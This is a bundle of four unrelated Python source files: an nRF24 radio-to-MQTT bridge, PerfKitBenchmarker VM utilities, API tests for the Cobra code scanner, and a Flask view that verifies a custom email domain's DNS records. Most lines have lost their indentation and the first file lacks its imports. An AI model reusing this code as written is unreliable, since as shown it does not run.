from RF24 import RF24, RF24_PA_LOW, RF24_250KBPS, RF24_CRC_8
import RPi.GPIO as GPIO
class Nrf24Manager:
def __init__(self, radio_config_file: str, mqtt_config_file: str):
# load config
with open(radio_config_file, 'r') as radio_config_file_content:
self.__radio_config = yaml.safe_load(radio_config_file_content)
with open(mqtt_config_file, 'r') as mqtt_config_file_content:
self.__mqtt_config = yaml.safe_load(mqtt_config_file_content)
# setup led
GPIO.setmode(GPIO.BOARD)
GPIO.setup(self.__radio_config["led_pin"], GPIO.OUT)
GPIO.output(self.__radio_config["led_pin"], GPIO.LOW)
self.__threaded_blink(num_blinks=3)
# setup writing interface
self.__writing_triggered = False
self.__writing_payload = None
# setup mqtt
self.__client = mqtt.Client()
self.__client.on_connect = self.__on_connect
self.__client.on_message = self.__on_message
self.__client.username_pw_set(self.__mqtt_config["user"], password=self.__mqtt_config["password"])
logging.info(f"Try to connected to MQTT broker \"{self.__mqtt_config['host']}\" at port \"{self.__mqtt_config['port']}\".")
self.__client.connect(self.__mqtt_config["host"], self.__mqtt_config["port"], 60)
self.__client.loop_start()
# setup rf24 radio
self.__radio = RF24(self.__radio_config["ce_pin"], self.__radio_config["cs_pin"])
if not self.__radio.begin():
raise RuntimeError("RF24 hardware is not responding. Maybe the pins are not correct.")
self.__radio.setChannel(self.__radio_config["channel"])
if not self.__radio.setDataRate(RF24_250KBPS):
raise RuntimeError("Could not set radio data rate correctly.")
self.__radio.setAutoAck(True)
self.__radio.enableDynamicPayloads()
self.__radio.setCRCLength(RF24_CRC_8)
self.__radio.setPALevel(RF24_PA_LOW)
if not self.__radio.isPVariant():
logging.warning("Warning: The radio is not a nRF24L01+ radio.")
#self.__radio.setPayloadSize(self.__radio_config["payload_size"])
#self.__radio.setRetries(self.__radio_config["retry_delay"], self.__radio_config["max_retries"])
logging.info(f'Opening writing pipe 0 with address "{self.__radio_config["pipes"]["writing"]["address"]}".')
self.__radio.openWritingPipe(self.__radio_config["pipes"]["writing"]["address"].encode('utf-8'))
for pipe_idx, reading_pipe in enumerate(self.__radio_config["pipes"]["reading"]):
logging.info(f'Opening reading pipe {pipe_idx + 1} with address "{reading_pipe["address"]}".')
self.__radio.openReadingPipe(pipe_idx + 1, reading_pipe["address"].encode('utf-8'))
self.__radio.startListening()
# enter loop
try:
while True:
self.__loop()
time.sleep(0.01)
except KeyboardInterrupt:
self.__radio.powerDown()
self.__client.loop_stop()
sys.exit()
def __loop(self):
# receive message
available, pipe = self.__radio.available_pipe()
if available:
receive_payload = self.__radio.read(self.__radio_config["payload_size"])
pipe_config = self.__radio_config["pipes"]["reading"][pipe - 1]
try:
receive_payload = receive_payload.split(b'\x00')[0]
receive_payload_str = receive_payload.decode('utf-8')
logging.info(f'Got radio message in pipe "{pipe_config["address"]}" with payload "{receive_payload_str}".')
topic = pipe_config["topic"]
if receive_payload_str.startswith("["):
if receive_payload_str.startswith("[c]") or receive_payload_str.startswith("[confirm]"):
logging.info('Message confirmed.')
return
else:
receive_payload_str_split = receive_payload_str.split("] ")
subtopic = receive_payload_str_split[0].replace("[", "")
receive_payload_str = "] ".join(receive_payload_str_split[1:])
topic += subtopic
logging.info(f"Pubish payload \"{receive_payload_str}\" in MQTT topic \"{topic}\".")
self.__client.publish(topic, payload=receive_payload_str, qos=2)
if pipe_config["blink"]:
self.__threaded_blink(num_blinks=2)
except UnicodeDecodeError:
logging.warning(f'Got radio message in pipe "{pipe_config["address"]}", but could not decode payload. Most likely the message got corrupted. Received payload="{receive_payload}".')
if pipe_config["blink"]:
self.__threaded_blink(num_blinks=5)
# send message
if self.__writing_triggered:
self.__writing_triggered = False
encoded_payload = self.__writing_payload.encode('utf-8')
encoded_payload = encoded_payload[:32]
logging.info(f'Send payload "{encoded_payload}" via radio in pipe "{self.__radio_config["pipes"]["writing"]["address"]}".')
self.__radio.stopListening()
if not self.__radio.write(encoded_payload):
logging.warning("Sending the message via radio was not successful.")
self.__radio.startListening()
if self.__radio_config["pipes"]["writing"]["blink"]:
self.__threaded_blink(num_blinks=1)
def __threaded_blink(self, num_blinks: int):
blink_thread = threading.Thread(target=self.__blink, args=(num_blinks,))
blink_thread.start()
def __blink(self, num_blinks: int):
for blink_idx in range(num_blinks):
GPIO.output(self.__radio_config["led_pin"], GPIO.HIGH)
time.sleep(0.1)
GPIO.output(self.__radio_config["led_pin"], GPIO.LOW)
time.sleep(0.1)
def __on_connect(self, client, _userdata, _flags, return_code):
logging.info(f"Connected to MQTT broker with result code \"{return_code}\".")
client.subscribe(self.__radio_config["pipes"]["writing"]["topic"])
logging.info(f"Subscribed to MQTT topic {self.__radio_config['pipes']['writing']['topic']}.")
def __on_message(self, _client, _userdata, msg):
payload = msg.payload.decode("utf-8")
logging.info(f"MQTT writing command with payload: {payload}")
self.__writing_payload = payload
self.__writing_triggered = True
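# Editor's note (illustrative sketch, not part of the original file): the keys
# accessed above imply config files shaped roughly as follows; all concrete
# values are assumptions.
#
# radio_config.yaml:
#   led_pin: 11
#   ce_pin: 22
#   cs_pin: 0
#   channel: 76
#   payload_size: 32
#   pipes:
#     writing: {address: "1Node", topic: "home/rf24/send", blink: true}
#     reading:
#       - {address: "2Node", topic: "home/rf24/", blink: true}
#
# mqtt_config.yaml:
#   host: "localhost"
#   port: 1883
#   user: "mqtt"
#   password: "secret"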
if __name__ == "__main__":
# setup logging
logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S', stream=sys.stdout)
logging.info("Start Nrf24 Manager.")
radio_config_file = "./radio_config.yaml"
mqtt_config_file = "./mqtt_config.yaml"
Nrf24Manager(radio_config_file=radio_config_file, mqtt_config_file=mqtt_config_file)
|
vm_util.py
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of utility functions for working with virtual machines."""
import contextlib
import logging
import os
import platform
import random
import re
import string
import subprocess
import tempfile
import threading
import time
import jinja2
from perfkitbenchmarker import background_tasks
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import temp_dir
FLAGS = flags.FLAGS
PRIVATE_KEYFILE = 'perfkitbenchmarker_keyfile'
PUBLIC_KEYFILE = 'perfkitbenchmarker_keyfile.pub'
CERT_FILE = 'perfkitbenchmarker.pem'
# The temporary directory on VMs. We cannot reuse GetTempDir()
# because run_uri will not be available at time of module load and we need
# to use this directory as a base for other module level constants.
VM_TMP_DIR = '/tmp/pkb'
# Default timeout for issuing a command.
DEFAULT_TIMEOUT = 300
# Defaults for retrying commands.
POLL_INTERVAL = 30
TIMEOUT = 1200
FUZZ = .5
MAX_RETRIES = -1
WINDOWS = 'nt'
DARWIN = 'Darwin'
PASSWORD_LENGTH = 15
OUTPUT_STDOUT = 0
OUTPUT_STDERR = 1
OUTPUT_EXIT_CODE = 2
_SIMULATE_MAINTENANCE_SEMAPHORE = threading.Semaphore(0)
flags.DEFINE_integer('default_timeout', TIMEOUT, 'The default timeout for '
'retryable commands in seconds.')
flags.DEFINE_integer('burn_cpu_seconds', 0,
'Amount of time in seconds to burn cpu on vm before '
'starting benchmark')
flags.DEFINE_integer('burn_cpu_threads', 1, 'Number of threads to use to '
'burn cpu before starting benchmark.')
flags.DEFINE_integer('background_cpu_threads', None,
'Number of threads of background cpu usage while '
'running a benchmark')
flags.DEFINE_integer('background_network_mbits_per_sec', None,
'Number of megabits per second of background '
'network traffic to generate during the run phase '
'of the benchmark')
flags.DEFINE_boolean('simulate_maintenance', False,
'Whether to simulate VM maintenance during the benchmark. '
'This requires both benchmark and provider support.')
flags.DEFINE_integer('simulate_maintenance_delay', 0,
'The number of seconds to wait to start simulating '
'maintenance.')
flags.DEFINE_boolean('ssh_reuse_connections', False,
'Whether to reuse SSH connections rather than '
'reestablishing a connection for each remote command.')
flags.DEFINE_integer('ssh_server_alive_interval', 30,
'Value for ssh -o ServerAliveInterval. Use with '
'--ssh_server_alive_count_max to configure how long to '
'wait for unresponsive servers.')
flags.DEFINE_integer('ssh_server_alive_count_max', 10,
'Value for ssh -o ServerAliveCountMax. Use with '
'--ssh_server_alive_interval to configure how long to '
'wait for unresponsive servers.')
class IpAddressSubset(object):
"""Enum of options for --ip_addresses."""
REACHABLE = 'REACHABLE'
BOTH = 'BOTH'
INTERNAL = 'INTERNAL'
EXTERNAL = 'EXTERNAL'
ALL = (REACHABLE, BOTH, INTERNAL, EXTERNAL)
flags.DEFINE_enum('ip_addresses', IpAddressSubset.REACHABLE,
IpAddressSubset.ALL,
'For networking tests: use both internal and external '
'IP addresses (BOTH), external and internal only if '
'the receiving VM is reachable by internal IP (REACHABLE), '
'external IP only (EXTERNAL) or internal IP only (INTERNAL)')
flags.DEFINE_enum('background_network_ip_type', IpAddressSubset.EXTERNAL,
(IpAddressSubset.INTERNAL, IpAddressSubset.EXTERNAL),
'IP address type to use when generating background network '
'traffic')
def GetTempDir():
"""Returns the tmp dir of the current run."""
return temp_dir.GetRunDirPath()
def PrependTempDir(file_name):
"""Returns the file name prepended with the tmp dir of the current run."""
return os.path.join(GetTempDir(), file_name)
def GenTempDir():
"""Creates the tmp dir for the current run if it does not already exist."""
temp_dir.CreateTemporaryDirectories()
def SSHKeyGen():
"""Create PerfKitBenchmarker SSH keys in the tmp dir of the current run."""
if not os.path.isdir(GetTempDir()):
GenTempDir()
if not os.path.isfile(GetPrivateKeyPath()):
create_cmd = ['ssh-keygen',
'-t',
'rsa',
'-N',
'',
'-q',
'-f',
PrependTempDir(PRIVATE_KEYFILE)]
shell_value = RunningOnWindows()
create_process = subprocess.Popen(create_cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
create_process.communicate()
if not os.path.isfile(GetCertPath()):
create_cmd = ['openssl',
'req',
'-x509',
'-new',
'-out',
PrependTempDir(CERT_FILE),
'-key',
PrependTempDir(PRIVATE_KEYFILE)]
shell_value = RunningOnWindows()
create_process = subprocess.Popen(create_cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
create_process.communicate(input='\n' * 7)
def GetPrivateKeyPath():
return PrependTempDir(PRIVATE_KEYFILE)
def GetPublicKeyPath():
return PrependTempDir(PUBLIC_KEYFILE)
def GetCertPath():
return PrependTempDir(CERT_FILE)
def GetSshOptions(ssh_key_filename, connect_timeout=5):
"""Return common set of SSH and SCP options."""
options = [
'-2',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'-o', 'IdentitiesOnly=yes',
'-o', 'PreferredAuthentications=publickey',
'-o', 'PasswordAuthentication=no',
'-o', 'ConnectTimeout=%d' % connect_timeout,
'-o', 'GSSAPIAuthentication=no',
'-o', 'ServerAliveInterval=%d' % FLAGS.ssh_server_alive_interval,
'-o', 'ServerAliveCountMax=%d' % FLAGS.ssh_server_alive_count_max,
'-i', ssh_key_filename
]
if FLAGS.use_ipv6:
options.append('-6')
if FLAGS.ssh_reuse_connections:
control_path = os.path.join(temp_dir.GetSshConnectionsDir(), '%C')
options.extend([
'-o', 'ControlPath="%s"' % control_path,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=10m'
])
options.extend(FLAGS.ssh_options)
return options
# TODO(skschneider): Remove at least RunParallelProcesses and RunParallelThreads
# from this file (update references to call directly into background_tasks).
RunParallelProcesses = background_tasks.RunParallelProcesses
RunParallelThreads = background_tasks.RunParallelThreads
RunThreaded = background_tasks.RunThreaded
def Retry(poll_interval=POLL_INTERVAL, max_retries=MAX_RETRIES,
timeout=None, fuzz=FUZZ, log_errors=True,
retryable_exceptions=None):
"""A function decorator that will retry when exceptions are thrown.
Args:
poll_interval: The time between tries in seconds. This is the maximum poll
interval when fuzz is specified.
max_retries: The maximum number of retries before giving up. If -1, this
means continue until the timeout is reached. The function will stop
retrying when either max_retries is met or timeout is reached.
timeout: The timeout for all tries in seconds. If -1, this means continue
until max_retries is met. The function will stop retrying when either
max_retries is met or timeout is reached.
fuzz: The amount of randomness in the sleep time. This is used to
keep threads from all retrying at the same time. At 0, this
means sleep exactly poll_interval seconds. At 1, this means
sleep anywhere from 0 to poll_interval seconds.
log_errors: A boolean describing whether errors should be logged.
retryable_exceptions: A tuple of exceptions that should be retried. By
default, this is None, which indicates that all exceptions should
be retried.
Returns:
A function that wraps functions in retry logic. It can be
used as a decorator.
"""
if retryable_exceptions is None:
retryable_exceptions = Exception
def Wrap(f):
"""Wraps the supplied function with retry logic."""
def WrappedFunction(*args, **kwargs):
"""Holds the retry logic."""
local_timeout = FLAGS.default_timeout if timeout is None else timeout
if local_timeout >= 0:
deadline = time.time() + local_timeout
else:
deadline = float('inf')
tries = 0
while True:
try:
tries += 1
return f(*args, **kwargs)
except retryable_exceptions as e:
fuzz_multiplier = 1 - fuzz + random.random() * fuzz
sleep_time = poll_interval * fuzz_multiplier
if ((time.time() + sleep_time) >= deadline or
(max_retries >= 0 and tries > max_retries)):
raise
else:
if log_errors:
logging.info('Retrying exception running %s: %s', f.__name__, e)
time.sleep(sleep_time)
return WrappedFunction
return Wrap
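# Editor's note: illustrative sketch only (not part of PerfKitBenchmarker),
# showing how the Retry decorator above is applied. The helper below is
# hypothetical.
@Retry(poll_interval=5, max_retries=3, retryable_exceptions=(OSError,))
def _ExampleFlakyRead(path):
  """Reads a file, retrying transient OSErrors (illustration only)."""
  with open(path) as f:
    return f.read()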
def IssueCommand(cmd, force_info_log=False, suppress_warning=False,
env=None, timeout=DEFAULT_TIMEOUT, cwd=None):
"""Tries running the provided command once.
Args:
cmd: A list of strings such as is given to the subprocess.Popen()
constructor.
force_info_log: A boolean indicating whether the command result should
always be logged at the info level. Command results will always be
logged at the debug level if they aren't logged at another level.
suppress_warning: A boolean indicating whether the results should
not be logged at the info level in the event of a non-zero
return code. When force_info_log is True, the output is logged
regardless of suppress_warning's value.
env: A dict of key/value strings, such as is given to the subprocess.Popen()
constructor, that contains environment variables to be injected.
timeout: Timeout for the command in seconds. If the command has not finished
before the timeout is reached, it will be killed. Set timeout to None to
let the command run indefinitely. If the subprocess is killed, the
return code will indicate an error, and stdout and stderr will
contain what had already been written to them before the process was
killed.
cwd: Directory in which to execute the command.
Returns:
A tuple of stdout, stderr, and retcode from running the provided command.
"""
if env:
logging.debug('Environment variables: %s', env)
full_cmd = ' '.join(cmd)
logging.info('Running: %s', full_cmd)
time_file_path = '/usr/bin/time'
running_on_windows = RunningOnWindows()
running_on_darwin = RunningOnDarwin()
should_time = (not (running_on_windows or running_on_darwin) and
os.path.isfile(time_file_path) and FLAGS.time_commands)
shell_value = running_on_windows
with tempfile.TemporaryFile() as tf_out, \
tempfile.TemporaryFile() as tf_err, \
tempfile.NamedTemporaryFile(mode='r') as tf_timing:
cmd_to_use = cmd
if should_time:
cmd_to_use = [time_file_path,
'-o', tf_timing.name,
'--quiet',
'-f', ', WallTime:%Es, CPU:%Us, MaxMemory:%Mkb '] + cmd
process = subprocess.Popen(cmd_to_use, env=env, shell=shell_value,
stdin=subprocess.PIPE, stdout=tf_out,
stderr=tf_err, cwd=cwd)
def _KillProcess():
logging.error('IssueCommand timed out after %d seconds. '
'Killing command "%s".', timeout, full_cmd)
process.kill()
timer = threading.Timer(timeout, _KillProcess)
timer.start()
try:
process.wait()
finally:
timer.cancel()
tf_out.seek(0)
stdout = tf_out.read().decode('ascii', 'ignore')
tf_err.seek(0)
stderr = tf_err.read().decode('ascii', 'ignore')
timing_output = ''
if should_time:
timing_output = tf_timing.read().rstrip('\n')
debug_text = ('Ran: {%s} ReturnCode:%s%s\nSTDOUT: %s\nSTDERR: %s' %
(full_cmd, process.returncode, timing_output, stdout, stderr))
if force_info_log or (process.returncode and not suppress_warning):
logging.info(debug_text)
else:
logging.debug(debug_text)
return stdout, stderr, process.returncode
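# Editor's note: illustrative sketch only (not part of PerfKitBenchmarker),
# showing the typical call pattern for IssueCommand; the command is arbitrary.
def _ExampleIssueEcho():
  stdout, _, retcode = IssueCommand(['echo', 'hello'], timeout=60)
  return stdout if retcode == 0 else None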
def IssueBackgroundCommand(cmd, stdout_path, stderr_path, env=None):
"""Run the provided command once in the background.
Args:
cmd: Command to be run, as expected by subprocess.Popen.
stdout_path: Redirect stdout here. Overwritten.
stderr_path: Redirect stderr here. Overwritten.
env: A dict of key/value strings, such as is given to the subprocess.Popen()
constructor, that contains environment variables to be injected.
"""
logging.debug('Environment variables: %s', env)
full_cmd = ' '.join(cmd)
logging.info('Spawning: %s', full_cmd)
outfile = open(stdout_path, 'w')
errfile = open(stderr_path, 'w')
shell_value = RunningOnWindows()
subprocess.Popen(cmd, env=env, shell=shell_value,
stdout=outfile, stderr=errfile, close_fds=True)
@Retry()
def IssueRetryableCommand(cmd, env=None):
"""Tries running the provided command until it succeeds or times out.
Args:
cmd: A list of strings such as is given to the subprocess.Popen()
constructor.
env: An alternate environment to pass to the Popen command.
Returns:
A tuple of stdout and stderr from running the provided command.
"""
stdout, stderr, retcode = IssueCommand(cmd, env=env)
if retcode:
raise errors.VmUtil.CalledProcessException(
'Command returned a non-zero exit code.\n')
return stdout, stderr
def ParseTimeCommandResult(command_result):
"""Parse command result and get time elapsed.
Note this parses the output of bash's time builtin, not /usr/bin/time or other
implementations. You may need to run something like bash -c "time ./command"
to produce parseable output.
Args:
command_result: The result after executing a remote time command.
Returns:
Time taken for the command.
"""
  time_data = re.findall(r'real\s+(\d+)m(\d+\.\d+)', command_result)
time_in_seconds = 60 * float(time_data[0][0]) + float(time_data[0][1])
return time_in_seconds
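# Editor's note: illustrative sketch only (not part of PerfKitBenchmarker).
# ParseTimeCommandResult expects output from bash's "time" builtin, e.g.:
def _ExampleParseTime():
  sample = 'real\t0m2.500s\nuser\t0m0.010s\nsys\t0m0.000s'
  return ParseTimeCommandResult(sample)  # returns 2.5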
def ShouldRunOnExternalIpAddress(ip_type=None):
"""Returns whether a test should be run on an instance's external IP."""
ip_type_to_check = ip_type or FLAGS.ip_addresses
return ip_type_to_check in (IpAddressSubset.EXTERNAL, IpAddressSubset.BOTH,
IpAddressSubset.REACHABLE)
def ShouldRunOnInternalIpAddress(sending_vm, receiving_vm, ip_type=None):
"""Returns whether a test should be run on an instance's internal IP.
Based on the command line flag --ip_addresses. Internal IP addresses are used
when:
* --ip_addresses=BOTH or --ip-addresses=INTERNAL
* --ip_addresses=REACHABLE and 'sending_vm' can ping 'receiving_vm' on its
internal IP.
Args:
sending_vm: VirtualMachine. The client.
receiving_vm: VirtualMachine. The server.
ip_type: optional ip_type to use instead of what is set in the FLAGS
Returns:
Whether a test should be run on an instance's internal IP.
"""
ip_type_to_check = ip_type or FLAGS.ip_addresses
return (ip_type_to_check in (IpAddressSubset.BOTH, IpAddressSubset.INTERNAL)
or (ip_type_to_check == IpAddressSubset.REACHABLE and
sending_vm.IsReachable(receiving_vm)))
def GetLastRunUri():
"""Returns the last run_uri used (or None if it can't be determined)."""
runs_dir_path = temp_dir.GetAllRunsDirPath()
try:
dir_names = next(os.walk(runs_dir_path))[1]
except StopIteration:
# The runs directory was not found.
return None
if not dir_names:
# No run subdirectories were found in the runs directory.
return None
# Return the subdirectory with the most recent modification time.
return max(dir_names,
key=lambda d: os.path.getmtime(os.path.join(runs_dir_path, d)))
@contextlib.contextmanager
def NamedTemporaryFile(prefix='tmp', suffix='', dir=None, delete=True):
"""Behaves like tempfile.NamedTemporaryFile.
The existing tempfile.NamedTemporaryFile has the annoying property on
Windows that it cannot be opened a second time while it is already open.
This makes it impossible to use it with a "with" statement in a cross platform
compatible way. This serves a similar role, but allows the file to be closed
within a "with" statement without causing the file to be unlinked until the
context exits.
"""
f = tempfile.NamedTemporaryFile(prefix=prefix, suffix=suffix,
dir=dir, delete=False)
try:
yield f
finally:
if not f.closed:
f.close()
if delete:
os.unlink(f.name)
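# Editor's note: illustrative sketch only (not part of PerfKitBenchmarker).
# Unlike tempfile.NamedTemporaryFile, the helper above allows closing the file
# and reopening it by name inside the "with" block (which matters on Windows).
def _ExampleNamedTemporaryFile():
  with NamedTemporaryFile(suffix='.txt') as tf:
    tf.write(b'hello')
    tf.close()  # safe to close early; unlink happens when the context exits
    with open(tf.name, 'rb') as fp:
      return fp.read()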
def GenerateSSHConfig(vms, vm_groups):
"""Generates an SSH config file to simplify connecting to the specified VMs.
Writes a file to GetTempDir()/ssh_config with an SSH configuration for each VM
provided in the arguments. Users can then SSH with any of the following:
ssh -F <ssh_config_path> <vm_name>
ssh -F <ssh_config_path> vm<vm_index>
ssh -F <ssh_config_path> <group_name>-<index>
Args:
vms: list of BaseVirtualMachines.
vm_groups: dict mapping VM group name string to list of BaseVirtualMachines.
"""
target_file = os.path.join(GetTempDir(), 'ssh_config')
template_path = data.ResourcePath('ssh_config.j2')
environment = jinja2.Environment(undefined=jinja2.StrictUndefined)
with open(template_path) as fp:
template = environment.from_string(fp.read())
with open(target_file, 'w') as ofp:
ofp.write(template.render({'vms': vms, 'vm_groups': vm_groups}))
ssh_options = [' ssh -F {0} {1}'.format(target_file, pattern)
for pattern in ('<vm_name>', 'vm<index>',
'<group_name>-<index>')]
logging.info('ssh to VMs in this benchmark by name with:\n%s',
'\n'.join(ssh_options))
def RunningOnWindows():
"""Returns True if PKB is running on Windows."""
return os.name == WINDOWS
def RunningOnDarwin():
"""Returns True if PKB is running on a Darwin OS machine."""
return os.name != WINDOWS and platform.system() == DARWIN
def ExecutableOnPath(executable_name):
"""Return True if the given executable can be found on the path."""
cmd = ['where'] if RunningOnWindows() else ['which']
cmd.append(executable_name)
shell_value = RunningOnWindows()
process = subprocess.Popen(cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
process.communicate()
if process.returncode:
return False
return True
def GenerateRandomWindowsPassword(password_length=PASSWORD_LENGTH):
"""Generates a password that meets Windows complexity requirements."""
# The special characters have to be recognized by the Azure CLI as
# special characters. This greatly limits the set of characters
# that we can safely use. See
# https://github.com/Azure/azure-xplat-cli/blob/master/lib/commands/arm/vm/vmOsProfile._js#L145
special_chars = '*!@#$%+='
# Ensure that the password contains at least one of each 4 required
# character types starting with letters to avoid starting with chars which
# are problematic on the command line e.g. @.
prefix = [random.choice(string.ascii_lowercase),
random.choice(string.ascii_uppercase),
random.choice(string.digits),
random.choice(special_chars)]
password = [
random.choice(string.ascii_letters + string.digits + special_chars)
for _ in range(password_length - 4)]
return ''.join(prefix + password)
def StartSimulatedMaintenance():
"""Initiates the simulated maintenance event."""
if FLAGS.simulate_maintenance:
_SIMULATE_MAINTENANCE_SEMAPHORE.release()
def SetupSimulatedMaintenance(vm):
"""Called ready VM for simulated maintenance."""
if FLAGS.simulate_maintenance:
def _SimulateMaintenance():
_SIMULATE_MAINTENANCE_SEMAPHORE.acquire()
time.sleep(FLAGS.simulate_maintenance_delay)
vm.SimulateMaintenanceEvent()
t = threading.Thread(target=_SimulateMaintenance)
t.daemon = True
t.start()
def CopyFileBetweenVms(filename, src_vm, src_path, dest_vm, dest_path):
"""Copies a file from the src_vm to the dest_vm."""
with tempfile.NamedTemporaryFile() as tf:
temp_path = tf.name
src_vm.RemoteCopy(
temp_path, os.path.join(src_path, filename), copy_to=False)
dest_vm.RemoteCopy(
temp_path, os.path.join(dest_path, filename), copy_to=True)
|
test_apiserver.py
|
# -*- coding: utf-8 -*-
"""
tests.apiserver
    ~~~~~~~~~~~~~~~
Tests cobra.api
:author: 40huo <git@40huo.cn>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
import json
import multiprocessing
import os
import shutil
import socket
import time
import requests
from cobra.api import start
from cobra.config import project_directory, running_path
p = multiprocessing.Process(target=start, args=('127.0.0.1', 5000, False))
p.start()
time.sleep(1)
config_path = os.path.join(project_directory, 'config')
template_path = os.path.join(project_directory, 'config.template')
shutil.copyfile(template_path, config_path)
a_sid = ''
s_sid = ''
def test_add_job():
url = "http://127.0.0.1:5000/api/add"
post_data = {
"key": "your_secret_key",
"target": [os.path.join(project_directory, 'tests/vulnerabilities')]
}
headers = {
"Content-Type": "application/json",
}
re = requests.post(url=url, data=json.dumps(post_data), headers=headers)
result = json.loads(re.text)
global a_sid
a_sid = result.get('result').get('sid')
a_sid_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
# wait writing scan_list
while True:
with open(a_sid_file, 'r') as f:
scan_list = json.load(f)
print(scan_list)
if len(scan_list.get('sids')) > 0:
break
time.sleep(0.1)
global s_sid
s_sid = list(scan_list.get('sids').keys())[0]
assert "1001" in re.text
assert "Add scan job successfully" in re.text
assert "sid" in re.text
def test_job_status():
url = "http://127.0.0.1:5000/api/status"
post_data = {
"key": "your_secret_key",
"sid": a_sid,
}
headers = {
"Content-Type": "application/json",
}
re = requests.post(url=url, data=json.dumps(post_data), headers=headers)
assert "1001" in re.text
assert "msg" in re.text
assert a_sid in re.text
assert "status" in re.text
assert "report" in re.text
def test_result_data():
url = 'http://127.0.0.1:5000/api/list'
post_data = {
'sid': s_sid,
}
headers = {
"Content-Type": "application/json",
}
re = requests.post(url=url, data=json.dumps(post_data), headers=headers)
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
if os.path.exists(s_sid_file):
assert '1001' in re.text
assert 'result' in re.text
assert 'rule_filter' in re.text
else:
assert '1002' in re.text
assert 'No such target' in re.text
def test_result_detail():
url = 'http://127.0.0.1:5000/api/detail'
post_data = {
'sid': s_sid,
'file_path': 'v.php',
}
headers = {
"Content-Type": "application/json",
}
re = requests.post(url=url, data=json.dumps(post_data), headers=headers)
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
if os.path.exists(s_sid_file):
assert '1001' in re.text
assert 'file_content' in re.text
else:
assert '1002' in re.text
assert 'No such target' in re.text
def test_index():
url = 'http://127.0.0.1:5000/'
re = requests.get(url=url)
assert 'Github / Gitlab' in re.text
url = 'http://127.0.0.1:5000/?sid=abcde'
re = requests.get(url=url)
assert 'scan id does not exist!' in re.text
def test_close_api():
os.remove(config_path)
p.terminate()
p.join()
# wait for scan data
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
while not os.path.exists(s_sid_file):
time.sleep(1)
# wait for port closed
s = socket.socket()
s.settimeout(0.5)
while s.connect_ex(('localhost', 5000)) == 0:
time.sleep(0.5)
assert not os.path.exists(config_path)
|
domain_detail.py
|
from threading import Thread
from flask import render_template, request, redirect, url_for, flash
from flask_login import login_required, current_user
from app.config import EMAIL_SERVERS_WITH_PRIORITY, EMAIL_DOMAIN
from app.dashboard.base import dashboard_bp
from app.dns_utils import (
get_mx_domains,
get_spf_domain,
get_txt_record,
get_cname_record,
)
from app.email_utils import send_email
from app.extensions import db
from app.log import LOG
from app.models import CustomDomain, Alias, DomainDeletedAlias
@dashboard_bp.route("/domains/<int:custom_domain_id>/dns", methods=["GET", "POST"])
@login_required
def domain_detail_dns(custom_domain_id):
custom_domain = CustomDomain.get(custom_domain_id)
if not custom_domain or custom_domain.user_id != current_user.id:
flash("You cannot see this page", "warning")
return redirect(url_for("dashboard.index"))
spf_record = f"v=spf1 include:{EMAIL_DOMAIN} -all"
# hardcode the DKIM selector here
dkim_cname = f"dkim._domainkey.{EMAIL_DOMAIN}"
dmarc_record = "v=DMARC1; p=quarantine; pct=100; adkim=s; aspf=s"
mx_ok = spf_ok = dkim_ok = dmarc_ok = True
mx_errors = spf_errors = dkim_errors = dmarc_errors = []
if request.method == "POST":
if request.form.get("form-name") == "check-mx":
mx_domains = get_mx_domains(custom_domain.domain)
if sorted(mx_domains) != sorted(EMAIL_SERVERS_WITH_PRIORITY):
flash("The MX record is not correctly set", "warning")
mx_ok = False
# build mx_errors to show to user
mx_errors = [
f"{priority} {domain}" for (priority, domain) in mx_domains
]
else:
flash(
"Your domain can start receiving emails. You can now use it to create alias",
"success",
)
custom_domain.verified = True
db.session.commit()
return redirect(
url_for(
"dashboard.domain_detail_dns", custom_domain_id=custom_domain.id
)
)
elif request.form.get("form-name") == "check-spf":
spf_domains = get_spf_domain(custom_domain.domain)
if EMAIL_DOMAIN in spf_domains:
custom_domain.spf_verified = True
db.session.commit()
flash("SPF is setup correctly", "success")
return redirect(
url_for(
"dashboard.domain_detail_dns", custom_domain_id=custom_domain.id
)
)
else:
custom_domain.spf_verified = False
db.session.commit()
flash(
f"SPF: {EMAIL_DOMAIN} is not included in your SPF record.",
"warning",
)
spf_ok = False
spf_errors = get_txt_record(custom_domain.domain)
elif request.form.get("form-name") == "check-dkim":
dkim_record = get_cname_record("dkim._domainkey." + custom_domain.domain)
if dkim_record == dkim_cname:
flash("DKIM is setup correctly.", "success")
custom_domain.dkim_verified = True
db.session.commit()
return redirect(
url_for(
"dashboard.domain_detail_dns", custom_domain_id=custom_domain.id
)
)
else:
custom_domain.dkim_verified = False
db.session.commit()
flash("DKIM: the CNAME record is not correctly set", "warning")
dkim_ok = False
dkim_errors = [dkim_record or "[Empty]"]
elif request.form.get("form-name") == "check-dmarc":
txt_records = get_txt_record("_dmarc." + custom_domain.domain)
if dmarc_record in txt_records:
custom_domain.dmarc_verified = True
db.session.commit()
flash("DMARC is setup correctly", "success")
return redirect(
url_for(
"dashboard.domain_detail_dns", custom_domain_id=custom_domain.id
)
)
else:
custom_domain.dmarc_verified = False
db.session.commit()
flash(
f"DMARC: The TXT record is not correctly set",
"warning",
)
